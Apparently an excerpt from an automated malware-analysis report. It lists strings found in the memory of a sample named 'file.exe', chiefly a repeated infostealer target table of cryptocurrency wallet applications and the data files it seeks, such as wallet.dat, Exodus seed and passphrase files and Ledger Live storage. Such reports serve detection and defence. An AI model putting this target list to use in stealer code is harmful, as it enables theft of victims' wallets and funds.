Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\.es
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 